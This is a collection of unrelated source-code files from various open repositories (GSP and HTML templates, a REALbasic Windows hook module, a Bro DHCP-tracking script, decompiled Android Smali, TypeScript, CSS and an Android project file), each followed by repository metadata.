<label for="ami">AMI:</label>
</td>
<td class="value">
<g:select name="ami" noSelection="['':'Default (all AMIs)']" value="${params.ami}" from="${images}"
optionKey="imageId" optionValue="imageLocation" class="allowEmptySelect" />
</td>
</tr>
<tr class="prop advanced">
<td class="name">
<label for="cluster">Cluster:</label>
</td>
<td class="value">
<g:select name="cluster" noSelection="['':'Default (all clusters)']" value="${params.cluster}" from="${clusterNames}"
class="allowEmptySelect" />
</td>
</tr>
<tr class="prop">
<td valign="top" class="name">
<label for="appId">Application:</label>
</td>
<td>
<g:select title="The application that this property is used for"
name="appId" noSelection="['':'Default (all apps)']" value="${params.appId}" from="${appNames}"
class="allowEmptySelect" />
</td>
</tr>
<tr class="prop advanced">
<td class="name">
<label for="countries">Countries:</label>
</td>
<td class="value">
<g:textField id="countries" name="countries" value="${params.countries}"/>
</td>
</tr>
<tr class="prop">
<td class="name">
<label for="stack">Stack:</label>
</td>
<td class="value">
<g:textField id="stack" name="stack" value="${params.stack}"/>
</td>
</tr>
<tr class="prop advanced">
<td class="name">
<label for="zone">Zone:</label>
</td>
<td class="value">
<g:select name="zone" noSelection="['':'Default (all zones)']" value="${params.zone}" from="${zoneNames}"
class="allowEmptySelect" />
</td>
</tr>
<tr class="prop">
<td valign="top" class="name">
<label for="fastPropertyRegion">Region:</label>
</td>
<td>
<g:select title="The AWS region that this property is used in, or blank for all regions"
name="fastPropertyRegion" noSelection="['':'Default (all regions)']"
value="${params.fastPropertyRegion}" from="${regionOptions}" class="allowEmptySelect"
optionKey="code" optionValue="description"/>
</td>
</tr>
</tbody>
</table>
</div>
<div class="buttons">
<g:buttonSubmit class="save" value="save">Create New Fast Property</g:buttonSubmit>
</div>
</g:form>
</div>
</body>
</html>
| Groovy Server Pages | 3 | claymccoy/asgard | grails-app/views/fastProperty/create.gsp | [
"Apache-2.0"
] |
unique template site/one/onevm;
include 'components/chkconfig/config';
# set opennebula map
include 'quattor/aii/opennebula/schema';
bind "/system/opennebula" = opennebula_vmtemplate;
include 'site/config-vm';
include 'quattor/aii/opennebula/default';
"/software/packages/{acpid}" = dict();
"/software/components/chkconfig/service/acpid" = dict('on', '', 'startstop', true);
| Pan | 3 | JavascriptID/sourcerer-app | src/test/resources/samples/langs/Pan/onevm.pan | [
"MIT"
] |
it("should compile non-immutable exports with missing semicolons", function(){
require("./exportvar");
});
| JavaScript | 2 | 1shenxi/webpack | test/cases/compile/issue2221/index.js | [
"MIT"
] |
#tag Module
Protected Module HooksWFS
#tag Method, Flags = &h21
Private Function IdleHookCallbackFunction(nCode as Integer, wParam as Integer, lParam as Integer) As Integer
if nCode >= 0 then
if mIdleHandler <> nil then
' Call the idle handler for the user
mIdleHandler.Idle
end
end if
#if TargetWin32
Soft Declare Function CallNextHookEx Lib "User32" ( hookHandle as Integer, code as Integer, _
wParam as Integer, lParam as Integer ) as Integer
' And make sure we call the next hook in the list
return CallNextHookEx( mIdleHandlerHook, nCode, wParam, lParam )
#else
#pragma unused wParam
#pragma unused lParam
#endif
End Function
#tag EndMethod
#tag Method, Flags = &h1
Protected Sub InstallIdleHook(i as IdleHandlerWFS)
' If we already have an idle handler, then we
' cannot install a new one. Just bail out
if mIdleHandlerHook <> 0 then return
#if TargetWin32
Declare Function SetWindowsHookExA Lib "User32" ( hookType as Integer, proc as Ptr, _
instance as Integer, threadID as Integer ) as Integer
Declare Function GetCurrentThreadId Lib "Kernel32" () as Integer
' Store the idle handler
mIdleHandler = i
Const WH_FOREGROUNDIDLE = 11
// Well if this isn't about as strange as you can get... I tried turning this into a
// Unicode-savvy function, but couldn't make a go of it. Using the exact same
// code (only the W version of SetWindowsHookEx) causes a crash to occur
// immediately after the call returns. I wasn't able to find any information about
// why the crash was happening, and it doesn't make any sense (the Windows is
// a Unicode window, so there's no mixed-type calls). Since this function doesn't
// deal with strings, there's no real benefit to making it Unicode-savvy, so I'm leaving
// the function as-is.
' And install the handler
mIdleHandlerHook= SetWindowsHookExA( WH_FOREGROUNDIDLE, AddressOf IdleHookCallbackFunction, _
0, GetCurrentThreadId )
#else
#pragma unused i
#endif
End Sub
#tag EndMethod
#tag Method, Flags = &h1
Protected Function InstallKeyboardHook(attachTo as KeyboardHookHandlerWFS) As Boolean
' If we already have an idle handler, then we
' cannot install a new one. Just bail out
if attachTo = nil then return false
if mAttached <> nil then return false
#if TargetWin32
Declare Function SetWindowsHookExA Lib "User32" ( hookType as Integer, proc as Ptr, _
instance as Integer, threadID as Integer ) as Integer
Declare Function GetCurrentThreadId Lib "Kernel32" () as Integer
' Store the keyboard handler
mAttached = attachTo
' And install the handler
Const WH_KEYBOARD = 2
mKeyboardHookHandle = SetWindowsHookExA( WH_KEYBOARD, AddressOf KeyboardHookCallbackFunction, 0, GetCurrentThreadId )
#endif
return mKeyboardHookHandle <> 0
End Function
#tag EndMethod
#tag Method, Flags = &h21
Private Function KeyboardHookCallbackFunction(nCode as Integer, wParam as Integer, lParam as Integer) As Integer
if nCode >= 0 and mAttached <> nil then
' Call the keyboard handler for the user
mAttached.KeyboardProc( wParam, lParam )
end
#if TargetWin32
Declare Function CallNextHookEx Lib "User32" ( hookHandle as Integer, code as Integer, _
wParam as Integer, lParam as Integer ) as Integer
' And make sure we call the next hook in the list
return CallNextHookEx( mKeyboardHookHandle, nCode, wParam, lParam )
#endif
End Function
#tag EndMethod
#tag Method, Flags = &h1
Protected Sub RemoveIdleHook()
' If we don't have an idle handler, then we
' can just bail out
if mIdleHandlerHook = 0 then return
#if TargetWin32
Declare Sub UnhookWindowsHookEx Lib "User32" ( hookHandle as Integer )
UnhookWindowsHookEx( mIdleHandlerHook )
#endif
End Sub
#tag EndMethod
#tag Method, Flags = &h1
Protected Sub RemoveKeyboardHook()
' If we don't have an keyboard handler, then we
' can just bail out
if mKeyboardHookHandle = 0 then return
#if TargetWin32
Declare Sub UnhookWindowsHookEx Lib "User32" ( hookHandle as Integer )
UnhookWindowsHookEx( mKeyboardHookHandle )
#endif
End Sub
#tag EndMethod
#tag Method, Flags = &h1
Protected Function TranslateKeyToString(lParam as Integer) As String
#if TargetWin32
Soft Declare Function GetKeyNameTextW Lib "User32" ( lParam as Integer, _
theStr as Ptr, theStrLen as Integer ) as Integer
Soft Declare Function GetKeyNameTextA Lib "User32" ( lParam as Integer, _
theStr as Ptr, theStrLen as Integer ) as Integer
dim mb as new MemoryBlock( 25 )
dim trueLen as Integer
if System.IsFunctionAvailable( "GetKeyNameTextW", "User32" ) then
trueLen = GetKeyNameTextW( lParam, mb, mb.Size )
return mb.WString( 0 )
else
trueLen = GetKeyNameTextA( lParam, mb, mb.Size )
return mb.CString( 0 )
end if
#else
#pragma unused lParam
#endif
End Function
#tag EndMethod
#tag Property, Flags = &h21
Private mAttached As KeyboardHookHandlerWFS
#tag EndProperty
#tag Property, Flags = &h21
Private mIdleHandler As IdleHandlerWFS
#tag EndProperty
#tag Property, Flags = &h21
Private mIdleHandlerHook As Integer
#tag EndProperty
#tag Property, Flags = &h21
Private mKeyboardHookHandle As Integer
#tag EndProperty
#tag ViewBehavior
#tag ViewProperty
Name="Index"
Visible=true
Group="ID"
InitialValue="-2147483648"
InheritedFrom="Object"
#tag EndViewProperty
#tag ViewProperty
Name="Left"
Visible=true
Group="Position"
InitialValue="0"
InheritedFrom="Object"
#tag EndViewProperty
#tag ViewProperty
Name="Name"
Visible=true
Group="ID"
InheritedFrom="Object"
#tag EndViewProperty
#tag ViewProperty
Name="Super"
Visible=true
Group="ID"
InheritedFrom="Object"
#tag EndViewProperty
#tag ViewProperty
Name="Top"
Visible=true
Group="Position"
InitialValue="0"
InheritedFrom="Object"
#tag EndViewProperty
#tag EndViewBehavior
End Module
#tag EndModule
| REALbasic | 4 | bskrtich/WFS | Windows Functionality Suite/Miscellaneous/Modules/HooksWFS.rbbas | [
"MIT"
] |
<html>
<head>
<title>AutoMLBoard</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
{% load staticfiles %}
<!-- jquery and bootstrap dependency -->
<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.11.0/umd/popper.min.js" integrity="sha384-b/U6ypiBEHpOf/4+1nzFpr53nxSS+GLCkfwBdFNTxtclqqenISfwAzpKaMNFNmj4" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/js/bootstrap.min.js" integrity="sha384-h0AbiXch4ZDo7tp9hKZ4TsHbi047NrKGLO3SEJAg45jXxnGIfYzk4Si90RDIqNm1" crossorigin="anonymous"></script>
<!-- bootstrap table dependency -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-table/1.12.1/bootstrap-table.min.css">
<script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-table/1.12.1/bootstrap-table.min.js"></script>
<link rel="stylesheet" href="/static/css/bootstrap.min.css">
<link rel="stylesheet" href="/static/css/App.css">
<link rel="stylesheet" href="/static/css/HomePage.css">
<link rel="stylesheet" href="/static/css/ExperimentView.css">
<script src="/static/js/ExperimentList.js"></script>
<link rel="stylesheet" href="/static/css/ExperimentList.css">
<!-- awesome dependency -->
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.2.0/css/all.css" integrity="sha384-hWVjflwFxL6sNzntih27bfxkr27PmbbK/iSvJ+a4+0owXq79v+lsFkW54bOGbiDQ" crossorigin="anonymous">
</head>
<body>
<nav class="navbar navbar-expand-lg navbar-dark bg-primary" style="margin-right: auto;margin-left: auto;">
<a class="navbar-brand" href="#" style="padding-left: 50px">AutoMLBoard</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarColor01" aria-controls="navbarColor01" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarColor01">
<ul class="navbar-nav mr-auto">
<li class="nav-item">
<a class="nav-link" href="/">Home <span class="sr-only">(current)</span></a>
</li>
<li class="nav-item">
<a class="nav-link" href="https://github.com/ray-project/ray">Github</a>
</li>
<li class="nav-item">
<a class="nav-link" href="http://docs.ray.io/">Document</a>
</li>
</ul>
</div>
</nav>
<div class="container" style="max-width: none">
<div class="outer-container row" id = "row-main">
<div class="HomePage-experiment-list-container col-md-2" id="sidebar">
<div>
<div class="collapsed-expander-container">
<div class="experiment-list-outer-container">
<div><h1 class="experiments-header">Experiments</h1>
<div class="collapser-container" onclick="collapse_experiment_list()">
<i class="collapser fa fa-chevron-left login-icon"></i>
</div>
<div class="experiment-list-container" style="height: 800px;">
<ul class="nav nav-pills flex-column">
{% for job in recent_jobs %}
<tr>
<li class="nav-item">
<a class="nav-link" href="job?job_id={{ job.job_id }}">{{ job.job_id }}</a>
</li>
</tr>
{% endfor %}
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="experiment-view-container col-md-8" id="content">
<div class="ExperimentPage">
<div>
<div class="ExperimentView">
<h1>{{ current_job.job_id }}</h1>
<hr class="divider"/>
<div class="metadata" style="max-width: 900px;">
<span class="metadata">
<span class="metadata-header">User:</span>
{{ current_job.user }}
</span>
<span class="metadata" style="margin-right: 0px">
<span class="metadata-header">Progress:
</span>
<span>{{ current_job.total_num }} Trials</span>
<span class="badge badge-pill badge-info" style="margin-left: 10px; border-radius: 0.3em">{{ current_job.running_num }} Running</span>
<span class="badge badge-pill badge-success" style="border-radius: 0.3em">{{ current_job.success_num }} Success</span>
<span class="badge badge-pill badge-danger" style="border-radius: 0.3em">{{ current_job.failed_num }} Failed</span>
<span class="progress"
style="width: 150px; float: right; margin-right: 120px; margin-top: 5px">
<span class="progress-bar bg-success" role="progressbar" style="width: {{ current_job.progress }}%;"></span>
</span>
</span>
<span class="metadata" style="line-height: 40px">
<span class="metadata-header">Start Time:</span>
{{ current_job.start_time }}
</span>
</div>
<div class="ExperimentView-runs">
<hr class="divider"/>
<table class="table table-hover"
id="trial_table"
data-toggle="table"
data-show-columns="true"
data-show-export="true"
data-minimum-count-columns="2"
data-id-field="id"
data-show-pagination-switch="true"
data-page-list="[10, 25, 50, 100, ALL]"
data-pagination="true"
style="border: none; max-height: 800px">
<thead>
<tr>
<th class="top-row" scope="colgroup" colspan="4">Trials</th>
<th class="top-row left-border" scope="colgroup" colspan="{{ param_num }}">Parameters</th>
<th class="top-row left-border" scope="colgroup" colspan="{{ metric_num }}">Metrics</th>
</tr>
<tr>
<th class="bottom-row" data-field="Trial-ID" data-sortable="true">Trial-ID</th>
<th class="bottom-row" data-field="Status" data-sortable="true">Status</th>
<th class="bottom-row" data-field="Start Time" data-sortable="true">Start Time</th>
<th class="bottom-row" data-field="End Time" data-sortable="true">End Time</th>
{% for param in param_keys %}
<th class="bottom-row" data-field="{{ param }}" data-sortable="true">{{ param }}</th>
{% endfor %}
{% for metric in metric_keys %}
<th class="bottom-row" data-field="{{ metric }}"
data-sortable="true">{{ metric }}</th>
{% endfor %}
</tr>
</thead>
<tbody>
{% for trial in recent_trials %}
<tr>
<td><a href="/trial?job_id={{ trial.job_id }}&trial_id={{ trial.trial_id }}">{{ trial.trial_id }}</a></td>
<td>{{ trial.trial_status}} <!--a href="#">(Kill)</a--></td>
<td>{{ trial.start_time }}</td>
<td>{{ trial.end_time }}</td>
{% for param in trial.params.items %}
<td>{{ param.1 }}</td>
{% endfor %}
<td>{{ trial.metrics.episode_reward }}</td>
<td>{{ trial.metrics.loss }}</td>
<td>{{ trial.metrics.accuracy }}</td>
</tr>
{% endfor %}
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
<div class="experiment-view-right"></div>
</div>
</div>
</body>
</html> | HTML | 3 | firebolt55439/ray | python/ray/tune/automlboard/templates/job.html | [
"Apache-2.0"
] |
// @target: es5
// @module: esnext
// @experimentalDecorators: true
declare function foo(...args: any[]): any;
@foo
export default class C {
static x() { return C.y; }
static y = 1
p = 1;
method() { }
} | TypeScript | 3 | nilamjadhav/TypeScript | tests/cases/conformance/externalModules/esnext/esnextmodulekindWithES5Target11.ts | [
"Apache-2.0"
] |
<div class="attribute" {{modifier}} {{! comment}}>
Hello
</div>
<div>
Hello
</div>
<div>
hi
</div>
<div>
A long enough string to trigger a line break that would prevent wrapping.
</div>
<div>
A long enough string to trigger a line break that would prevent wrapping more.
</div>
<div>
A long enough string to trigger a line break that would prevent wrapping more and more.
</div>
<div>
{{#block}}
{{hello}}
{{/block}}
</div>
<div>
{{hello}}
</div>
<div></div>
<img />
<MyComponent @prop={{true}} @prop2={{true}} @prop3={{true}} @prop4={{true}} as |thing|></MyComponent>
| Handlebars | 2 | tumido/prettier | tests/format/handlebars/element-node/element-node.hbs | [
"MIT"
] |
//
// DoraemonDemoImageViewController.h
// DoraemonKitDemo
//
// Created by yixiang on 2019/6/18.
// Copyright © 2019年 yixiang. All rights reserved.
//
#import "DoraemonDemoBaseViewController.h"
NS_ASSUME_NONNULL_BEGIN
@interface DoraemonDemoImageViewController : DoraemonDemoBaseViewController
@end
NS_ASSUME_NONNULL_END
| C | 3 | wangfengye/DoraemonKit | iOS/DoraemonKitDemo/DoraemonKitDemo/DemoVC/Net/Image/DoraemonDemoImageViewController.h | [
"Apache-2.0"
] |
size: 2048px 1200px;
dpi: 240;
limit-x: 1 5;
limit-y: 0 10000;
scale-y: log;
axes {
label-format-y: base(10);
}
grid {
color: rgba(0 0 0 0.05);
}
lines {
data-x: csv("test/testdata/log_example.csv" x);
data-y: csv("test/testdata/log_example.csv" y);
}
| CLIPS | 3 | asmuth-archive/travistest | test/examples/charts_custom_logarithmic_scale.clp | [
"Apache-2.0"
] |
<mat-expansion-panel>
<mat-expansion-panel-header>
<mat-panel-title>
Enabled-by-default column resize for MatTable
</mat-panel-title>
</mat-expansion-panel-header>
<default-enabled-column-resize-example></default-enabled-column-resize-example>
</mat-expansion-panel>
<mat-expansion-panel>
<mat-expansion-panel-header>
<mat-panel-title>
Enabled-by-default column resize for flex MatTable
</mat-panel-title>
</mat-expansion-panel-header>
<default-enabled-column-resize-flex-example></default-enabled-column-resize-flex-example>
</mat-expansion-panel>
<mat-expansion-panel>
<mat-expansion-panel-header>
<mat-panel-title>
Opt-in column resize for MatTable
</mat-panel-title>
</mat-expansion-panel-header>
<opt-in-column-resize-example></opt-in-column-resize-example>
</mat-expansion-panel>
| HTML | 4 | tungyingwaltz/components | src/dev-app/column-resize/column-resize-home.html | [
"MIT"
] |
@import './child.css';
h1 {
color: gray;
}
| CSS | 2 | acidburn0zzz/parcel | packages/examples/kitchen-sink/src/styles.css | [
"MIT"
] |
.foo {margin:var( --n-gutterSize) 0 var( --gutterSize ) var( --n-gutterSize );
}
| CSS | 2 | fuelingtheweb/prettier | tests/stylefmt/var-notation/var-notation.css | [
"MIT"
] |
package com.bumptech.glide.testutil;
import static com.google.common.truth.Truth.assertThat;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
/** Shared utility classes for tests. */
// Public API.
@SuppressWarnings("WeakerAccess")
public final class TestUtil {
private TestUtil() {
// Utility class.
}
public static byte[] resourceToBytes(Class<?> testClass, String resourceName) throws IOException {
return isToBytes(TestResourceUtil.openResource(testClass, resourceName));
}
public static byte[] isToBytes(InputStream is) throws IOException {
ByteArrayOutputStream os = new ByteArrayOutputStream();
byte[] buffer = new byte[1024];
int read;
try {
while ((read = is.read(buffer)) != -1) {
os.write(buffer, 0, read);
}
} finally {
is.close();
}
return os.toByteArray();
}
public static String isToString(InputStream is) throws IOException {
return new String(isToBytes(is), "utf-8");
}
public static void assertStreamOf(String expected, InputStream result) throws IOException {
assertThat(expected).isEqualTo(isToString(result));
}
}
| Java | 4 | qq411860630/glide | testutil/src/main/java/com/bumptech/glide/testutil/TestUtil.java | [
"Apache-2.0"
] |
RSpec.shared_examples_for 'Msf::DBManager::Import::Spiceworks' do
it { is_expected.to respond_to :import_spiceworks_csv }
end
| Ruby | 3 | OsmanDere/metasploit-framework | spec/support/shared/examples/msf/db_manager/import/spiceworks.rb | [
"BSD-2-Clause",
"BSD-3-Clause"
] |
--TEST--
Bug #38850 (lookupNamespaceURI does not return default namespace)
--EXTENSIONS--
dom
--FILE--
<?php
$xml = <<<HERE
<?xml version="1.0" ?>
<foo xmlns="http://www.example.com/ns/foo" />
HERE;
$doc = new DOMDocument();
$doc->loadXML($xml);
$root = $doc->documentElement;
print $root->lookupNamespaceURI(NULL);
?>
--EXPECT--
http://www.example.com/ns/foo
| PHP | 3 | NathanFreeman/php-src | ext/dom/tests/bug38850.phpt | [
"PHP-3.01"
] |
@0x9ef128e10a8010b2;
struct NullableUInt64
{
union
{
value @0 : UInt64;
null @1 : Void;
}
}
struct Tuple
{
nullable @0 : NullableUInt64;
}
struct Message
{
nullable @0 : NullableUInt64;
array @1 : List(NullableUInt64);
tuple @2 : Tuple;
}
| Cap'n Proto | 2 | pdv-ru/ClickHouse | tests/queries/0_stateless/format_schemas/02030_capnp_nullable.capnp | [
"Apache-2.0"
] |
-@ import val it: InvoiceInfo
%h1 Paid Invoice
- for { invoice <- paidInvoiceOption }
- render(webPath("Invoice.scaml"), Map("invoice" -> invoice))
- render(webPath("InvoiceAddress.scaml"), Map("address" -> invoice.address))
| Scaml | 3 | pkeshab/eventsourced-example | src/main/webapp/WEB-INF/org/eligosource/eventsourced/example/web/Invoice.paid.scaml | [
"Apache-2.0"
] |
sleep 1
t app key mode
sleep 5
t app key record
sleep 1
reboot yes
| AGS Script | 1 | waltersgrey/autoexechack | HERO/TimeLapse/10Seconds/autoexec.ash | [
"MIT"
] |
/**
* This file is part of the Phalcon Framework.
*
* (c) Phalcon Team <team@phalcon.io>
*
* For the full copyright and license information, please view the LICENSE.txt
* file that was distributed with this source code.
*/
namespace Phalcon\Mvc\Micro;
use Phalcon\Mvc\Micro;
/**
* Allows to implement Phalcon\Mvc\Micro middleware in classes
*/
interface MiddlewareInterface
{
/**
* Calls the middleware
*/
public function call(<Micro> application);
}
| Zephir | 4 | tidytrax/cphalcon | phalcon/Mvc/Micro/MiddlewareInterface.zep | [
"BSD-3-Clause"
] |
import createSvgIcon from './utils/createSvgIcon';
import { jsx as _jsx } from "react/jsx-runtime";
export default createSvgIcon([/*#__PURE__*/_jsx("path", {
d: "M12 5c-1.93 0-5 4.91-5 9 0 2.76 2.24 5 5 5s5-2.24 5-5c0-4.09-3.07-9-5-9zm1 13c-3.01 0-5-2-5-5 0-.55.45-1 1-1s1 .45 1 1c0 2.92 2.42 3 3 3 .55 0 1 .45 1 1s-.45 1-1 1z",
opacity: ".3"
}, "0"), /*#__PURE__*/_jsx("path", {
d: "M12 3C8.5 3 5 9.33 5 14c0 3.87 3.13 7 7 7s7-3.13 7-7c0-4.67-3.5-11-7-11zm0 16c-2.76 0-5-2.24-5-5 0-4.09 3.07-9 5-9s5 4.91 5 9c0 2.76-2.24 5-5 5z"
}, "1"), /*#__PURE__*/_jsx("path", {
d: "M13 16c-.58 0-3-.08-3-3 0-.55-.45-1-1-1s-1 .45-1 1c0 3 1.99 5 5 5 .55 0 1-.45 1-1s-.45-1-1-1z"
}, "2")], 'EggTwoTone'); | JavaScript | 3 | dany-freeman/material-ui | packages/mui-icons-material/lib/esm/EggTwoTone.js | [
"MIT"
] |
select hostname();
select hostName() h, count() from cluster(test_cluster_two_shards, system.one) group by h;
| SQL | 3 | pdv-ru/ClickHouse | tests/queries/0_stateless/02001_hostname_test.sql | [
"Apache-2.0"
] |
import createSvgIcon from './utils/createSvgIcon';
import { jsx as _jsx } from "react/jsx-runtime";
export default createSvgIcon( /*#__PURE__*/_jsx("path", {
d: "m9.31 17 2.44-2.44L14.19 17l1.06-1.06-2.44-2.44 2.44-2.44L14.19 10l-2.44 2.44L9.31 10l-1.06 1.06 2.44 2.44-2.44 2.44L9.31 17zM19 3h-1V1h-2v2H8V1H6v2H5c-1.11 0-1.99.9-1.99 2L3 19c0 1.1.89 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2zm0 16H5V8h14v11z"
}), 'EventBusy'); | JavaScript | 3 | good-gym/material-ui | packages/material-ui-icons/lib/esm/EventBusy.js | [
"MIT"
] |
At: "import-014-c.hac":17:
parse error: syntax error
parser stacks:
state value
#STATE# (imported-root-list) [7:1--8:27]
#STATE# (process-prototype) [10:1..48]
#STATE# { [11:1]
#STATE# list<(def-body-item)>: (instance-decl) ... [12:2--13:15]
#STATE# keyword: prs [16:2..4]
#STATE# (null)
#STATE# { [16:6]
#STATE# (prs-literal) [17:3..5]
#STATE# + [17:6]
in state #STATE#, possible rules are:
single_prs: prs_expr . prs_arrow prs_literal_base dir (#RULE#)
acceptable tokens are:
IMPLIES (shift)
RARROW (shift)
HASH_ARROW (shift)
| Bison | 1 | broken-wheel/hacktist | hackt_docker/hackt/test/lexer/import-014-c.stderr.bison | [
"MIT"
] |
<div class="modal error hidden" id="modal-cancel-subscription">
<!-- <button class="close"><img src="../assets/cross.svg" alt="close" title="close message"></button> -->
<h3>CANCEL SUBSCRIPTION</h3>
<p>are you sure you'd like to cancel your subscription?</p>
<b></b>
<section>
<p class="message">
<br><br>
your subscription will be cancelled immediately, and you won't be refunded for the days left on
your subscription.
<br><br>
if you're already using more storage than what the free plan provides, upon
cancellation of your subscription your account will become read-only until you clear enough space.
<br><br>
if you are using more storage than what the free plan provides, your account will be deleted after 30 days. if you have an email address on file, you will receive a notification 15 days before we take action on your account.
<br><br>
<br><br>
</p>
</section>
<progress id="unsubscribing" class="progress" value="0" max="100"></progress>
<button class="action l md white" onclick="confirmedCancelSubscription();">yes, unsubscribe!</button>
<button class="action r sm bold white cancel" onclick="hideActiveModal();">no, wait!</button>
</div> | Kit | 3 | pws1453/web-client | source/imports/app/account-modal-cancel-subscription.kit | [
"MIT"
] |
.class Landroid/support/v4/app/BackStackRecord$1;
.super Ljava/lang/Object;
.source "BackStackRecord.java"
# interfaces
.implements Landroid/support/v4/app/FragmentTransitionCompat21$ViewRetriever;
# annotations
.annotation system Ldalvik/annotation/EnclosingMethod;
value = Landroid/support/v4/app/BackStackRecord;->configureTransitions(ILandroid/support/v4/app/BackStackRecord$TransitionState;ZLandroid/util/SparseArray;Landroid/util/SparseArray;)Z
.end annotation
.annotation system Ldalvik/annotation/InnerClass;
accessFlags = 0x0
name = null
.end annotation
# instance fields
.field final synthetic this$0:Landroid/support/v4/app/BackStackRecord;
.field final synthetic val$inFragment:Landroid/support/v4/app/Fragment;
# direct methods
.method constructor <init>(Landroid/support/v4/app/BackStackRecord;Landroid/support/v4/app/Fragment;)V
.locals 0
.param p1, "this$0" # Landroid/support/v4/app/BackStackRecord;
.prologue
.line 1271
iput-object p1, p0, Landroid/support/v4/app/BackStackRecord$1;->this$0:Landroid/support/v4/app/BackStackRecord;
iput-object p2, p0, Landroid/support/v4/app/BackStackRecord$1;->val$inFragment:Landroid/support/v4/app/Fragment;
invoke-direct {p0}, Ljava/lang/Object;-><init>()V
return-void
.end method
# virtual methods
.method public getView()Landroid/view/View;
.locals 1
.prologue
.line 1274
iget-object v0, p0, Landroid/support/v4/app/BackStackRecord$1;->val$inFragment:Landroid/support/v4/app/Fragment;
invoke-virtual {v0}, Landroid/support/v4/app/Fragment;->getView()Landroid/view/View;
move-result-object v0
return-object v0
.end method
| Smali | 3 | jarekankowski/pegasus_spyware | sample3/decompiled_raw/smali/android/support/v4/app/BackStackRecord$1.smali | [
"MIT"
] |
github: [preactjs]
open_collective: preact
| YAML | 5 | webschik/preact | .github/FUNDING.yml | [
"MIT"
] |
# Copyright 2015 Reservoir Labs, Inc.
# All rights reserved.
#
# Contributed by Bob Rotsted
module TrackDHCP;
export {
global ip_to_mac: table[addr] of string &synchronized &write_expire=1day;
redef record Conn::Info += {
orig_mac: string &optional &log;
resp_mac: string &optional &log;
};
}
event DHCP::log_dhcp (rec: DHCP::Info) {
ip_to_mac[rec$assigned_ip] = rec$mac;
}
event connection_state_remove (c: connection) {
if ( c$id$orig_h in TrackDHCP::ip_to_mac )
c$conn$orig_mac = TrackDHCP::ip_to_mac[c$id$orig_h];
if ( c$id$resp_h in TrackDHCP::ip_to_mac )
c$conn$resp_mac = TrackDHCP::ip_to_mac[c$id$resp_h];
}
| Bro | 4 | reservoirlabs/bro-scripts | track-dhcp/track-dhcp.bro | [
"Apache-2.0"
] |
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0">
<PropertyGroup>
<ProductVersion>3.5</ProductVersion>
<ProjectGuid>{9d6d09c7-2c9e-4e67-abbf-8cfeaf30bade}</ProjectGuid>
<OutputType>Library</OutputType>
<Configuration Condition="'$(Configuration)' == ''">Release</Configuration>
<AllowLegacyCreate>False</AllowLegacyCreate>
<Name>com.remobjects.cardview</Name>
<RootNamespace>com.remobjects.cardview</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)' == 'Debug' ">
<Optimize>false</Optimize>
<OutputPath>.\bin\Debug</OutputPath>
<DefineConstants>DEBUG;TRACE;</DefineConstants>
<GenerateDebugInfo>True</GenerateDebugInfo>
<EnableAsserts>True</EnableAsserts>
<TreatWarningsAsErrors>False</TreatWarningsAsErrors>
<CaptureConsoleOutput>False</CaptureConsoleOutput>
<StartMode>Project</StartMode>
<RegisterForComInterop>False</RegisterForComInterop>
<CpuType>anycpu</CpuType>
<RuntimeVersion>v25</RuntimeVersion>
<XmlDoc>False</XmlDoc>
<XmlDocWarningLevel>WarningOnPublicMembers</XmlDocWarningLevel>
<WarnOnCaseMismatch>True</WarnOnCaseMismatch>
<EnableUnmanagedDebugging>False</EnableUnmanagedDebugging>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)' == 'Release' ">
<Optimize>true</Optimize>
<OutputPath>.\bin\Release</OutputPath>
<GenerateDebugInfo>False</GenerateDebugInfo>
<EnableAsserts>False</EnableAsserts>
<TreatWarningsAsErrors>False</TreatWarningsAsErrors>
<CaptureConsoleOutput>False</CaptureConsoleOutput>
<StartMode>Project</StartMode>
<RegisterForComInterop>False</RegisterForComInterop>
<CpuType>anycpu</CpuType>
<RuntimeVersion>v25</RuntimeVersion>
<XmlDoc>False</XmlDoc>
<XmlDocWarningLevel>WarningOnPublicMembers</XmlDocWarningLevel>
<EnableUnmanagedDebugging>False</EnableUnmanagedDebugging>
<WarnOnCaseMismatch>True</WarnOnCaseMismatch>
</PropertyGroup>
<ItemGroup>
<Folder Include="Properties\" />
<Folder Include="res\" />
<Folder Include="res\drawable-hdpi\" />
<Folder Include="res\drawable-ldpi\" />
<Folder Include="res\drawable-mdpi\" />
<Folder Include="res\drawable-xhdpi\" />
<Folder Include="res\values-v21" />
<Folder Include="res\values-v11" />
<Folder Include="res\values-sw600dp" />
<Folder Include="res\values\" />
<Folder Include="res\layout\" />
</ItemGroup>
<ItemGroup>
<AndroidResource Include="res\layout\activity_card_view.layout-xml" />
<AndroidResource Include="res\layout\cardviewfragment.layout-xml" />
<AndroidResource Include="res\values-sw600dp\template-dimens.android-xml" />
<AndroidResource Include="res\values-sw600dp\template-styles.android-xml" />
<AndroidResource Include="res\values-v11\template-styles.android-xml" />
<AndroidResource Include="res\values-v21\template-styles.android-xml" />
<AndroidResource Include="res\values\colors.android-xml" />
<AndroidResource Include="res\values\dimens.android-xml" />
<AndroidResource Include="res\values\strings.android-xml">
<SubType>Content</SubType>
</AndroidResource>
<AndroidResource Include="res\layout\main.layout-xml">
<SubType>Content</SubType>
</AndroidResource>
<AndroidResource Include="res\values\template-dimens.android-xml" />
<AndroidResource Include="res\values\template-styles.android-xml" />
